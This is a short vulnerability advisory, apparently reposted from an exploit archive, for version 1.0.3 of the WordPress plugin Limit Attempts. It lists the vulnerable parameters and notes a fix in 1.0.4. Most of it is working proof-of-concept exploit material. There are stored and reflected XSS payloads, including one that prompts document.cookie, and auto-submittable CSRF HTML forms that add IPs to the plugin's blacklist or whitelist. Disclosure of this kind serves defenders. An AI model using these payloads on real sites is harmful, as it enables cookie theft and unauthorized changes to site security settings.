WordPress Limit Attempts 1.0.3 Cross Site Scripting / Cross Site Request Forgery Vulnerabilities

WordPress Limit Attempts 1.0.3 Cross Site Scripting / Cross Site Request Forgery Vulnerabilities

Plugin Name : Limit Attempts
 
Effected Version : 1.0.3 (and most probably lower version's if any)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=blacklist
 
lmtttmpts_add_to_blacklist = “><script>alert(1)</script>
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=whitelist
 
lmtttmpts_add_to_whitelist = “><script>alert(1)</script>
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=go_pro
 
bws_license_key = “><img src=x onerror=prompt(document.cookie);>
 
 
Vulnerable Parameter : lmtttmpts_add_to_blacklist, lmtttmpts_add_to_whitelist, bws_license_key
 
 
Type of XSS : Reflected / Stored

Technical Details
 
Minimum Level of Access Required : Unauthenticated
 
PoC - (Proof of Concept) :
 
POC for Blcklist :
 
<html>
<body>
<form action=”http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=blacklist” method=”POST”>
<input type=”hidden” name=”lmtttmpts_add_to_blacklist” value=”192.168.1.1″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
 
POC for whitelist:
 
<html>
<body>
<form action=”http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=whitelist” method=”POST”>
<input type=”hidden” name=”lmtttmpts_add_to_whitelist” value=”192.168.1.1″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
 
In the value place change the IP which you want to block (or) allow
 
 
Vulnerable Parameter : Vulnerable_parameter
 
Fixed in : 1.0.4
 
http://wordpress.org/plugins/limit-attempts/changelog/

#  0day.today [2018-04-14]  #